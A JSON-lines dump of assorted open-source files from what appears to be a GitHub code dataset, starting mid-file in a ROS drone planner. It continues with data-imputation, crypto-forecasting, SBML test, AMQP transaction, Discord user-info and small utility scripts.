rospy.Subscriber(\"/firefly4/vi_sensor/left/image_raw\", Image, detect_in_vid4, queue_size = 1)\n\tvid_sub_5 = rospy.Subscriber(\"/firefly5/vi_sensor/left/image_raw\", Image, detect_in_vid5, queue_size = 1)\n\n\todom_sub_1 = rospy.Subscriber(\"/firefly1/odometry_sensor1/odometry\", Odometry, odom_cb1, queue_size = 1)\n\todom_sub_2 = rospy.Subscriber(\"/firefly2/odometry_sensor1/odometry\", Odometry, odom_cb2, queue_size = 1)\n\todom_sub_3 = rospy.Subscriber(\"/firefly3/odometry_sensor1/odometry\", Odometry, odom_cb3, queue_size = 1)\n\todom_sub_4 = rospy.Subscriber(\"/firefly4/odometry_sensor1/odometry\", Odometry, odom_cb4, queue_size = 1)\n\todom_sub_5 = rospy.Subscriber(\"/firefly5/odometry_sensor1/odometry\", Odometry, odom_cb5, queue_size = 1)\n\n\twp_id_sub_1 = rospy.Subscriber(\"/firefly1/current_waypoint_id\", Int32, wp_id_cb1, queue_size = 1)\n\twp_id_sub_2 = rospy.Subscriber(\"/firefly2/current_waypoint_id\", Int32, wp_id_cb2, queue_size = 1)\n\twp_id_sub_3 = 
rospy.Subscriber(\"/firefly3/current_waypoint_id\", Int32, wp_id_cb3, queue_size = 1)\n\twp_id_sub_4 = rospy.Subscriber(\"/firefly4/current_waypoint_id\", Int32, wp_id_cb4, queue_size = 1)\n\twp_id_sub_5 = rospy.Subscriber(\"/firefly5/current_waypoint_id\", Int32, wp_id_cb5, queue_size = 1)\n\n\n\tprint(\"x\\nx\\nx\\nx\\nx\\nx\\nx\\nIn nn sim \\nx\\nx\\nx\\nx\\nx\\nx\\nx\\n\")\n\t# d = rospy.Duration(3, 0)\n\t# rospy.sleep(d)\n\tprint(\"x\\nx\\nx\\nx\\nx 30 sec sleep done \\nx\\nx\\nx\\n\")\n\t\n\n\tis_path_ready = True\n\t# path_ready_pub1.publish(is_path_ready)\n\t# path_ready_pub2.publish(is_path_ready)\n\t# path_ready_pub3.publish(is_path_ready)\n\t# path_ready_pub4.publish(is_path_ready)\n\t# path_ready_pub5.publish(is_path_ready)\n\tpublish_path_status(is_path_ready)\n\n\n\n\n\n\n\n\trospy.spin()\n","repo_name":"samarth-kalluraya/SafePlan_simulation","sub_path":"rotors_simulator/rotors_gazebo/scripts/online_planner.py","file_name":"online_planner.py","file_ext":"py","file_size_in_byte":23513,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}
+{"seq_id":"37750269855","text":"\"\"\"Custom imputer to replace values within pandas dataframe columns with config-specified imputation schemes\n\nAuthor(s):\n Reka Daniel-Weiner (reka.danielweiner@weightwatchers.com)\n\n Carl Anderson (carl.anderson@weightwatchers.com)\n\n\"\"\"\nimport pandas as pd\nimport logging\nfrom primrose.base.transformer import AbstractTransformer\n\n\nclass ColumnSpecificImpute(AbstractTransformer):\n \"\"\"Transform config specified columns NULL values into zero, mean, median, mode, inf or negative inf\"\"\"\n\n def __init__(\n self,\n columns_to_zero,\n columns_to_mean,\n columns_to_median,\n columns_to_mode,\n columns_to_infinity,\n columns_to_neg_infinity,\n ):\n \"\"\"Transform config specified columns NULL values into zero, mean, median, mode, inf or negative inf\n\n Args:\n columns_to_zero (list): list of columns to impute zeros\n columns_to_mean (list): list of columns to impute means\n columns_to_median (list): list of columns to impute medians\n columns_to_mode (list): list of columns to impute modes\n columns_to_infinity (list): list of columns to impute to large value (999999999)\n columns_to_neg_infinity (list): list of columns to impute to large negative value (-999999999)\n\n Returns:\n nothing. Side effect to set list of columns to set to mean, 0, median etc\n\n \"\"\"\n self.columns_to_zero = columns_to_zero\n self.columns_to_mean = columns_to_mean\n self.columns_to_median = columns_to_median\n self.columns_to_mode = columns_to_mode\n self.columns_to_infinity = columns_to_infinity\n self.columns_to_neg_infinity = columns_to_neg_infinity\n self.encoder = None\n\n def fit(self, data):\n \"\"\"Fit encoder imputation values to dataframe metrics\n Create a dictionary of column name to imputed values. These values might be straight constants or might\n be a function of the complete column's value, such as mode or median\n\n Args:\n data (pandas data frame): a data frame\n\n Returns:\n Nothing. 
Updates internal dictionary of column name to imputed value\n\n Raises:\n Exception if a column appears in multiple lists, or if column not recognized\n\n \"\"\"\n\n self.encoder = {}\n columns_so_far = set()\n\n for cols in [\n self.columns_to_zero,\n self.columns_to_mean,\n self.columns_to_median,\n self.columns_to_mode,\n self.columns_to_infinity,\n self.columns_to_neg_infinity,\n ]:\n\n # does column exist?\n for col in cols:\n if not col in data.columns:\n raise Exception(\"Unrecognized impute column '\" + str(col) + \"'\")\n\n # is it in some previous list?\n in_common = columns_so_far.intersection(set(cols))\n if in_common:\n raise Exception(\"There are columns in multiple lists \" + str(in_common))\n columns_so_far = columns_so_far.union(set(cols))\n\n logging.info(\"Specifying columns to impute 0\")\n [self.encoder.setdefault(col, 0) for col in self.columns_to_zero]\n\n logging.info(\"Specifying columns to impute median\")\n [\n self.encoder.setdefault(col, data[col].median())\n for col in self.columns_to_median\n ]\n\n logging.info(\"Specifying columns to impute mean\")\n [self.encoder.setdefault(col, data[col].mean()) for col in self.columns_to_mean]\n\n logging.info(\"Specifying columns to impute large values\")\n [self.encoder.setdefault(col, 999999999.0) for col in self.columns_to_infinity]\n\n logging.info(\"Specifying columns to impute large negative values\")\n [\n self.encoder.setdefault(col, -999999999.0)\n for col in self.columns_to_neg_infinity\n ]\n\n logging.info(\"Specifying columns to impute mode\")\n for col in self.columns_to_mode:\n logging.info(\"imputing {}\".format(col))\n try:\n if pd.notnull(data[col].mode().values[0]):\n col_mode = data[col].mode().values[0]\n else:\n col_mode = 0\n except Exception:\n col_mode = 0\n\n self.encoder[col] = col_mode\n\n def transform(self, data):\n \"\"\"Impute columns in data according to the imputations fit by self.fit\n\n Args:\n data (dataframe)\n\n Returns:\n data (dataframe)\n\n Raises:\n Exception if train is not called before transfoorm\n\n \"\"\"\n\n if self.encoder is None:\n raise Exception(\n \"ColumnSpecificImpute must train imputations with fit before calling transform.\"\n )\n\n for col, val in self.encoder.items():\n data[col] = data[col].fillna(val)\n\n return data\n","repo_name":"ww-tech/primrose","sub_path":"primrose/transformers/impute.py","file_name":"impute.py","file_ext":"py","file_size_in_byte":4948,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"61"}
+{"seq_id":"34763409525","text":"# -*- coding: utf-8 -*-\r\n\"\"\"博客构建配置文件\r\n\"\"\"\r\n\r\n# For Maverick\r\nsite_prefix = \"/\"\r\nsource_dir = \"../src/\"\r\nbuild_dir = \"../dist/\"\r\nindex_page_size = 10\r\narchives_page_size = 20\r\nenable_jsdelivr = {\r\n \"enabled\": True,\r\n \"repo\": \"stormycloudy/stormycloudy.github.io@master\"\r\n}\r\n\r\n# 站点设置\r\nsite_name = \"Stormycloudy\"\r\nsite_logo = \"${site_prefix}logo.png\"\r\nsite_build_date = \"2019-12-31T15:10-05:00\"\r\nauthor = \"Shay L\"\r\nemail = \"xuecliu@iu.edu\"\r\nauthor_homepage = \"http://pages.iu.edu/~xuecliu\"\r\ndescription = \"Life is good.\"\r\nkey_words = ['ShayLiu', 'stormycloudy', 'atmosphericscience', 'blog']\r\nlanguage = 'en'\r\nexternal_links = [\r\n {\r\n \"name\": \"Shay Liu's research\",\r\n \"url\": \"https://xuecliu.pages.iu.edu/\",\r\n \"brief\": \"My research website on IU pages.\"\r\n }\r\n]\r\nnav = [\r\n {\r\n \"name\": \"Home\",\r\n \"url\": \"${site_prefix}\",\r\n \"target\": \"_self\"\r\n },\r\n {\r\n \"name\": \"Archived\",\r\n \"url\": \"${site_prefix}archives/\",\r\n \"target\": \"_self\"\r\n },\r\n {\r\n \"name\": \"About\",\r\n \"url\": \"${site_prefix}about/\",\r\n \"target\": \"_self\"\r\n }\r\n]\r\n\r\nsocial_links = [\r\n {\r\n \"name\": \" Twitter\",\r\n \"url\": \"https://twitter.com/baroclinicat\",\r\n \"icon\": \"fab fa-twitter\"\r\n },\r\n {\r\n \"name\": \" GitHub\",\r\n \"url\": \"https://github.com/stormycloudy\",\r\n \"icon\": \"fab fa-github\"\r\n },\r\n {\r\n \"name\": \" LinkedIn\",\r\n \"url\": \"https://www.linkedin.com/in/shayliu/\",\r\n \"icon\": \"fab fa-linkedin-in\"\r\n }\r\n]\r\n\r\nhead_addon = r'''\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n'''\r\n\r\nfooter_addon = ''\r\n\r\nbody_addon = ''\r\n","repo_name":"stormycloudy/stormycloudy.github.io","sub_path":"conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"7184918896","text":"import yfinance as yf\nimport pandas as pd\nimport numpy as np\nfrom datetime import date\nfrom prophet import Prophet\nimport json\nfrom prophet.serialize import model_to_json\nfrom sklearn.preprocessing import MinMaxScaler\nfrom tensorflow.keras.layers import Dense, Dropout, LSTM\nfrom tensorflow.keras.models import Sequential\nfrom keras.models import load_model\n\nimport joblib\n\nimport sqlite3\n\n\ncrypto_mapping = {\"Bitcoin\": \"BTC-USD\", \n \"Ethereum\": \"ETH-USD\", \n \"Tether\": \"USDT-USD\", \n \"BNB\": \"BNB-USD\", \n \"USD Coin\": \"USDC-USD\", \n \"Solana\": \"SOL-USD\", \n \"XRP\": \"XRP-USD\", \n \"Terra\": \"LUNA-USD\", \n \"Cardano\": \"ADA-USD\", \n \"Avalanche\": \"AVAX-USD\", \n \"Dogecoin\": \"DOGE-USD\", \n \"TerraUSD\": \"UST-USD\", \n \"Binance USD\": \"BUSD-USD\", \n \"Shiba Inu\": \"SHIB-USD\",\n \"Wrapped Bitcoin\": \"WBTC-USD\"}\n\n#This function will save all historical data from crypto beggining to current uploaded day\ndef save_historical_data(df, symbol_crypto, i):\n\n conn = sqlite3.connect('data/historical_prices.db')\n c = conn.cursor()\n name = i.replace(\" \", \"\")\n\n df_sql = df\n df_sql = df_sql.rename(columns = {'Adj Close':'Adj_Close'}, inplace = False)\n c.execute('CREATE TABLE IF NOT EXISTS '+ name +' (Date, Open, High, Low, Close, Adj_Close, Volume )')\n df_sql.to_sql(name, conn, if_exists='append', index = False)\n\n return 'Ok'\n\n#This function calculates and save prophet prediction as well as its model\ndef save_prophet(df1, symbol_crypto):\n prediction_days = 365\n df1[['ds','y']] = df1 [['Date', 'Adj Close']]\n model = Prophet()\n model.fit(df1)\n future = model.make_future_dataframe(prediction_days, freq='d')\n forecast = model.predict(future)\n\n #Save the model \n\n prediction_file_path = 'data/predictions/forecast_'+ symbol_crypto + '.csv'\n model_file_path = 'data/models/serialized_model_'+ symbol_crypto + '.json'\n with open(model_file_path, 'w') as fout:\n json.dump(model_to_json(model), fout) \n\n #Save the prediction\n forecast.to_csv(prediction_file_path)\n\n return (f'{symbol_crypto} Model and Prediction saved properly')\n\n\nprediction_days = 60 #Number of past days to take into account to calculate the prediction\n\ndef save_neural_network(df2, symbol_crypto):\n\n\n df2 = yf.download(symbol_crypto, start='2010-01-01',\n end=date.today())\n df2 = df2.reset_index()\n df2['Date'] = pd.to_datetime(df2['Date'])\n\n\n scaler = MinMaxScaler(feature_range=(0,1))\n scaled_data = scaler.fit_transform(df2['Close'].values.reshape(-1,1))\n\n\n x_train, y_train = [], []\n for x in range (prediction_days, len(scaled_data)):\n x_train.append(scaled_data[x-prediction_days:x, 0])\n y_train.append(scaled_data[x, 0])\n\n x_train, y_train = np.array(x_train), np.array(y_train)\n x_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1],1))\n\n\n model = Sequential()\n model.add(LSTM(units=50, return_sequences=True, input_shape=(x_train.shape[1],1)))\n model.add(Dropout(0.2))\n model.add(LSTM(units=50, return_sequences=True))\n model.add(Dropout(0.2))\n model.add(LSTM(units=50)) \n model.add(Dropout(0.2))\n model.add(Dense(units=1))\n\n model.compile(optimizer='adam', loss='mean_squared_error')\n model.fit(x_train, y_train, epochs=25, batch_size=32)\n\n #Save Scaler and Model\n scaler_filename = \"data/scalers_neural_network/\" + symbol_crypto + \"_scaler.save\"\n model_filename = \"data/models/\" + symbol_crypto + \"_keras.h5\"\n\n joblib.dump(scaler, scaler_filename) \n model.save(model_filename)\n\n 
return (f'{symbol_crypto} Model and scaler (Neural Network) saved properly')\n\n\n#Getting and applying functions to all listed cryptocurrencies \nfor i in crypto_mapping:\n print (crypto_mapping[i])\n symbol_crypto = crypto_mapping[i]\n\n data = yf.download(symbol_crypto, start='2010-01-01',\n end=date.today())\n data = data.reset_index()\n data['Date'] = pd.to_datetime(data['Date'])\n\n save_historical_data(data, symbol_crypto, i)\n save_prophet(data, symbol_crypto)\n save_neural_network(data, symbol_crypto)\n\n","repo_name":"ivanrepi/crypto_investment_helper","sub_path":"main_admin.py","file_name":"main_admin.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70898278914","text":"import os\nimport unittest\n\nimport libsbml\n\nfrom mod_cobra.efm.metatool_manager import convert_metabolite, convert_reaction\nimport cobra_tests\n\n__author__ = 'anna'\n\nDATA_DIR = os.path.join(os.path.dirname(os.path.abspath(cobra_tests.__file__)), 'data')\nTEST_SBML = os.path.join(DATA_DIR, 'test.xml')\n\n\ndef create_test_sbml():\n \"\"\"\n r2-> m2 <-r3-> m2_b\n <- ^\n m1_b <-r1-> m1 r6\n <- |\n r4-> m3 --r5-> m3_b\n \"\"\"\n document = libsbml.SBMLDocument(2, 4)\n model = document.createModel()\n model.setId('test_model')\n c = model.createCompartment()\n c_id = 'c'\n c.setId(c_id)\n b = model.createCompartment()\n b_id = 'b'\n b.setId(b_id)\n for m_id in ('m1', 'm2', 'm3'):\n convert_metabolite(m_id, model, False, c_id='c')\n for m_id in ('m1_b', 'm2_b', 'm3_b'):\n convert_metabolite(m_id, model, True, c_id='b')\n for (r_id, r_m_id2st, p_m_id2st, rev) in (('r1', {'m1_b': 1}, {'m1': 1}, True), ('r2', {'m1': 1}, {'m2': 1}, True),\n ('r3', {'m2': 1}, {'m2_b': 1}, True), ('r4', {'m1': 1}, {'m3': 1}, True),\n ('r5', {'m3': 1}, {'m3_b': 1}, False),\n ('r6', {'m3': 1}, {'m2': 1}, False)):\n convert_reaction(model, r_id, rev, r_m_id2st, p_m_id2st)\n libsbml.SBMLWriter().writeSBMLToFile(document, TEST_SBML)\n\n\nclass SBMLTestCase(unittest.TestCase):\n def setUp(self):\n create_test_sbml()\n\n def tearDown(self):\n if os.path.exists(TEST_SBML):\n os.remove(TEST_SBML)\n\n def test_species_num(self):\n doc = libsbml.SBMLReader().readSBML(TEST_SBML)\n model = doc.getModel()\n num_sps = model.getNumSpecies()\n self.assertEqual(6, num_sps, \"Number of species was supposed to be 6, got %d\" % num_sps)\n\n def test_reactions_num(self):\n doc = libsbml.SBMLReader().readSBML(TEST_SBML)\n model = doc.getModel()\n num_rs = model.getNumReactions()\n self.assertEqual(6, num_rs, \"Number of reactions was supposed to be 6, got %d\" % num_rs)\n\n def test_reactants_num(self):\n doc = libsbml.SBMLReader().readSBML(TEST_SBML)\n model = doc.getModel()\n r = model.getReaction('r6')\n self.assertEqual(1, r.getNumReactants(), \"Number of reactants of r6 was supposed to be 1, got %d\"\n % r.getNumReactants())\n\n def test_products_num(self):\n doc = libsbml.SBMLReader().readSBML(TEST_SBML)\n model = doc.getModel()\n r = model.getReaction('r6')\n self.assertEqual(1, r.getNumProducts(), \"Number of products of r6 was supposed to be 1, got %d\"\n % r.getNumProducts())\n\n def test_comps_num(self):\n doc = libsbml.SBMLReader().readSBML(TEST_SBML)\n model = doc.getModel()\n num_comps = model.getNumCompartments()\n self.assertEqual(2, num_comps, \"Number of compartments was supposed to be 2, got %d\" % num_comps)\n","repo_name":"annazhukova/mod_cobra","sub_path":"cobra_tests/SBMLTestCase.py","file_name":"SBMLTestCase.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"15653036333","text":"def solution(arr_val, arr_unit) :\n units = {\n 'm': 1, 'cm': 0.01, 'mm': 0.001, 'μm': 1E-6, 'ft': 0.3048,\n 'kg': 1, 'g': 0.001, 'mg': 0.000001, 'μg': 1E-09, 'lb': 0.453592,\n }\n\n\n object1_mass = arr_val[0] * units[arr_unit[0]]\n object2_mass = arr_val[1] * units[arr_unit[1]]\n distance = arr_val[2] * units[arr_unit[2]]\n G = 6.67*10**-11\n\n return G * (object1_mass * object2_mass / distance ** 2)","repo_name":"geodimitrov/Random","sub_path":"CodeWars/Python/8 kyu/find_the_force_of_gravity_between_two_objects.py","file_name":"find_the_force_of_gravity_between_two_objects.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"39612653821","text":"import numpy as np\nimport pandas as pd\nimport json\nimport argparse\n\n\n\n\ndef get_tissue_samples(annotation, tissue_id):\n \n female_samples = annotation.loc[(annotation.tissue_id == tissue_id) & (annotation.sex == 'Female')].index.sort_values()\n male_samples = annotation.loc[(annotation.tissue_id == tissue_id) & (annotation.sex == 'Male')].index.sort_values()\n \n return female_samples, male_samples\n\n\n\ndef select_json(tissue_samples):\n f = open('manifests/file-manifest.json')\n data = json.load(f)\n\n selected_json = []\n for s in tissue_samples:\n for i in range(len(data)):\n if s == data[i]['file_name'].split('.')[0]:\n selected_json.append(data[i])\n\n return selected_json\n\n\ndef write_manifest(selected_json, file_manifest_out):\n\n with open(file_manifest_out, 'w') as outfile:\n json.dump(selected_json, outfile)\n \n \nparser = argparse.ArgumentParser()\n\nparser.add_argument('--tissue_samples', type=str, required=True)\nparser.add_argument('--output', type=str, required=True)\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n tissue_samples = args.tissue_samples.split('.')\n output = args.output\n \n manifest_json = select_json(tissue_samples)\n write_manifest(manifest_json, output)\n","repo_name":"cfbuenabadn/gtex-stm","sub_path":"code/scripts/make_tissue_manifest.py","file_name":"make_tissue_manifest.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"8456250683","text":"import sqlite3\n\nclass CreateDB:\n \n def createData(self):\n connection = sqlite3.connect(\"tps.db\")\n\n with connection:\n connection.execute(\"CREATE TABLE tps(timestamp DATETIME, temperature NUMERIC, humidity NUMERIC)\")\n connection.close()\n\ncreate = CreateDB()\n\ndef main():\n create.createData()\n\nif __name__ == \"__main__\":\n main()\n\n ","repo_name":"AndrewAlvaro/Infosys-TransactionProcessingSystem","sub_path":"TPS/create_tables.py","file_name":"create_tables.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"17621363133","text":"import sys\nimport time\nimport logging\nlog = logging.getLogger('zen.AmqpDataManager')\n\n# DataManager class for adding msg queueing to zope and other XA\n# transaction cohorts. Usage with nested_transaction:\n#\n# with nested_transaction(AmqpDataManager(publisher.channel)) as txn:\n# # perform zope db commands\n# # perform SQLAlchemy db commands\n# publisher.publish(msg)\n#\nclass AmqpDataManager(object):\n \"\"\"Objects that manage transactional storage.\n\n These objects may manage data for other objects, or they may manage\n non-object storages, such as relational databases. For example,\n a ZODB.Connection.\n\n Note that when some data is modified, that data's data manager should\n join a transaction so that data can be committed when the user commits\n the transaction.\n \"\"\"\n\n def __init__(self, channel, txnmgr = None):\n self.channel = channel\n self.channel.tx_select()\n self.transaction_manager = txnmgr\n\n #\"\"\"The transaction manager (TM) used by this data manager.\n\n #This is a public attribute, intended for read-only use. The value\n #is an instance of ITransactionManager, typically set by the data\n #manager's constructor.\n #\"\"\")\n\n def abort(self, transaction):\n \"\"\"Abort a transaction and forget all changes.\n\n Abort must be called outside of a two-phase commit.\n\n Abort is called by the transaction manager to abort transactions\n that are not yet in a two-phase commit.\n \"\"\"\n # discard any messages that have been buffered\n log.debug(\"abort'ed\")\n if self.channel.is_open:\n self.channel.tx_rollback()\n\n # Two-phase commit protocol. These methods are called by the ITransaction\n # object associated with the transaction being committed. The sequence\n # of calls normally follows this regular expression:\n # tpc_begin commit tpc_vote (tpc_finish | tpc_abort)\n\n def tpc_begin(self, transaction):\n \"\"\"Begin commit of a transaction, starting the two-phase commit.\n\n transaction is the ITransaction instance associated with the\n transaction being committed.\n \"\"\"\n # nothing special to do here\n log.debug(\"tpc_begin'ed\")\n\n def commit(self, transaction):\n \"\"\"Commit modifications to registered objects.\n\n Save changes to be made persistent if the transaction commits (if\n tpc_finish is called later). If tpc_abort is called later, changes\n must not persist.\n\n This includes conflict detection and handling. If no conflicts or\n errors occur, the data manager should be prepared to make the\n changes persist when tpc_finish is called.\n \"\"\"\n # nothing special to do here\n log.debug(\"commit'ed\")\n\n\n def tpc_finish(self, transaction):\n \"\"\"Indicate confirmation that the transaction is done.\n\n Make all changes to objects modified by this transaction persist.\n\n transaction is the ITransaction instance associated with the\n transaction being committed.\n\n This should never fail. If this raises an exception, the\n database is not expected to maintain consistency; it's a\n serious error.\n \"\"\"\n log.debug(\"tpc_finish'ed\")\n try:\n self.channel.tx_commit()\n except Exception as e:\n log.exception(\"tpc_finish completed FAIL\")\n else:\n log.debug(\"tpc_finish completed OK\")\n\n\n def tpc_vote(self, transaction):\n \"\"\"Verify that a data manager can commit the transaction.\n\n This is the last chance for a data manager to vote 'no'. 
A\n data manager votes 'no' by raising an exception.\n\n transaction is the ITransaction instance associated with the\n transaction being committed.\n \"\"\"\n # Nothing to do here\n log.debug(\"tpc_voted\")\n\n\n def tpc_abort(self, transaction):\n \"\"\"Abort a transaction.\n\n This is called by a transaction manager to end a two-phase commit on\n the data manager. Abandon all changes to objects modified by this\n transaction.\n\n transaction is the ITransaction instance associated with the\n transaction being committed.\n\n This should never fail.\n \"\"\"\n log.debug(\"tpc_abort'ed\")\n try:\n self.channel.tx_rollback()\n except Exception as e:\n log.exception(e)\n log.debug(\"tpc_abort failed with exception\")\n else:\n log.debug(\"tpc_abort completed\")\n\n\n def sortKey(self):\n \"\"\"Return a key to use for ordering registered DataManagers.\n \"\"\"\n\n # this data manager must always go last\n return \"~~~~~~~\"\n\n#\n# usage outside of zope transaction\n# with AmqpTransaction(publisher.channel) as txn:\n# publisher.publish(msg)\n# publisher.publish(msg2)\n#\nclass AmqpTransaction(object):\n def __init__(self, channel):\n self.datamgr = AmqpDataManager(channel)\n self.txnid = int(time.clock()*1e6) % sys.maxint\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, traceback):\n if type is None:\n try:\n self.datamgr.tpc_begin(self.txnid)\n self.datamgr.commit(self.txnid)\n self.datamgr.tpc_vote(self.txnid)\n self.datamgr.tpc_finish(self.txnid)\n except Exception as e:\n self.datamgr.tpc_abort(self.txnid)\n raise\n else:\n try:\n self.datamgr.abort(self.txnid)\n except Exception as e:\n pass\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenUtils/AmqpDataManager.py","file_name":"AmqpDataManager.py","file_ext":"py","file_size_in_byte":5638,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"}
+{"seq_id":"20050376648","text":"from typing import Optional\n\nfrom nonebot.exception import ActionFailed\nfrom nonebot.log import logger\n\nfrom ..getter import UserInfoGetter, register_user_info_getter\nfrom ..image_source import DiscordUserAvatar\nfrom ..user_info import UserInfo\n\ntry:\n from nonebot.adapters.discord import Bot, Event, MessageEvent\n\n @register_user_info_getter(Bot, Event)\n class Getter(UserInfoGetter[Bot, Event]):\n async def _get_info(self, user_id: str) -> Optional[UserInfo]:\n user = None\n\n if isinstance(self.event, MessageEvent) and user_id == str(\n self.event.author.id\n ):\n user = self.event.author\n\n if not user and user_id == self.bot.self_id:\n try:\n user = await self.bot.get_current_user()\n except ActionFailed as e:\n logger.warning(f\"Error calling get_current_user: {e}\")\n\n if not user:\n try:\n user = await self.bot.get_user(user_id=int(user_id))\n except ActionFailed as e:\n logger.warning(f\"Error calling get_user: {e}\")\n\n if user:\n return UserInfo(\n user_id=str(user.id),\n user_name=user.username,\n user_avatar=DiscordUserAvatar(\n user_id=user.id, image_hash=user.avatar\n )\n if user.avatar\n else None,\n )\n\nexcept ImportError:\n pass\n","repo_name":"noneplugin/nonebot-plugin-userinfo","sub_path":"nonebot_plugin_userinfo/adapters/discord.py","file_name":"discord.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"61"}
+{"seq_id":"17521195601","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 3 11:08:17 2019\n\n@author: Luo XiYang\n\"\"\"\nimport os\nfrom itertools import groupby\n'''some tools'''\nclass AID:\n '''This function determines whether the numbers in a list are continuous and returns a continuous range.'''\n def ContinuousDigitalRange(list_X):\n minRange=[];maxRange=[];\n fun = lambda x: x[1]-x[0]\n for k, g in groupby(enumerate(list_X), fun):\n l1 = [j for i, j in g] # A list of consecutive numbers\n if len(l1) > 1:\n scop = str(min(l1)) + '-' + str(max(l1)) # Connect Continuous Digital Range with \"-\"\n minRange.append(min(l1));maxRange.append(max(l1));\n else:\n scop = l1[0]\n minRange.append(l1[0]);maxRange.append(l1[0]);\n #print(\"Continuous digital range:{}\".format(scop))\n #print(minRange);print(maxRange);\n return minRange,maxRange\n \n def ContinuousDigitalRange2(list_X):\n minRange=[];maxRange=[];\n fun = lambda x: x[1]-x[0]\n for k, g in groupby(enumerate(list_X), fun):\n l1 = [j for i, j in g] # A list of consecutive numbers\n if len(l1) > 1:\n if min(l1)==0:\n minRange.append(min(l1));maxRange.append(max(l1)+1);\n else:\n minRange.append(min(l1)+1);maxRange.append(max(l1)+1);\n else:\n minRange.append(l1[0]+1);maxRange.append(l1[0]+1);\n #print(\"Continuous digital range:{}\".format(scop))\n #print(minRange);print(maxRange);\n return minRange,maxRange\n \n def StatisticalNumber(listX):\n '''One-dimensional list: False; other:True'''\n Flag=isinstance(listX[0], list)\n if Flag==False:\n return len(listX)\n else:\n '''Two dimensional list'''\n Flag2=isinstance(listX[0][0], list)\n if(Flag2==False):\n return len(listX),len(listX[0])\n else:\n return \"no such a list\"\n def countFile(dirX):\n tmp = 0\n for item in os.listdir(dirX):\n if os.path.isfile(os.path.join(dirX, item)):\n tmp += 1\n else:\n tmp += AID.countFile(os.path.join(dirX, item))\n return tmp\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n","repo_name":"XiYang-Luo/Python-mgf-file-informations-extract","sub_path":"aid.py","file_name":"aid.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"34025741716","text":"import json\r\nimport re\r\nfrom method.atom import Atom\r\n\r\n\r\nif __name__ == \"__main__\":\r\n with open('structure compare.json', 'r+') as fp:\r\n result_json = json.load(fp)\r\n result = []\r\n for element in result_json:\r\n element = json.loads(element)\r\n for key, value in element.items():\r\n if re.match('type', key):\r\n continue\r\n elif re.match('su', key) or re.match('un', key):\r\n atom_list = []\r\n for pair in value:\r\n tmp = []\r\n for atom in pair:\r\n atom_json = json.loads(atom)\r\n tmp.append(Atom(atom_json['pos'], type=atom_json['type'], num=atom_json['num']))\r\n atom_list.append(tmp)\r\n element[key] = atom_list\r\n else:\r\n atom_list = []\r\n for atom in value:\r\n atom_json = json.loads(atom)\r\n atom_list.append(Atom(atom_json['pos'], type=atom_json['type'], num=atom_json['num']))\r\n element[key] = atom_list\r\n result.append(element)\r\n print(result)\r\n","repo_name":"jingslaw/cluster_embedded_model","sub_path":"method/readjson.py","file_name":"readjson.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"7525263205","text":"from swiftly.runtime.python.frameworks.django.main import detect_django, run_check\n\nFRAMEWORK_CONFIG = {\n \"name\": \"django\",\n \"type\": \"web\",\n \n # a python function that detects if runtime is the current runtime (in this case, detect if it's a python runtime)\n \"detect\": detect_django,\n \n # a list of custom functions. \"command\": \"shell/bat function name\"\n \"custom\": {\n \"migrate\": \"manage_django_commands\",\n \"makemigrations\": \"manage_django_commands\",\n },\n \n \"framework_commands\" : ['makeapp', 'run'],\n \"run_check\": run_check\n}","repo_name":"brainspoof/swiftly-sys","sub_path":"swiftly/runtime/python/frameworks/django/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"4497210903","text":"# Naive Solution\n\nn = 942\nsum = 0\nwhile n>0 or sum >9:\n if n==0:\n n=sum\n sum=0\n sum+=n%10\n n//=10\nprint(sum)\n\n# One Liner\n\nn = 493193 \nprint(n if n<10 else n%9)\nprint(n%9 or n and 9)","repo_name":"shubham2704/competetive_coding","sub_path":"codewars/sumOfDigits.py","file_name":"sumOfDigits.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}
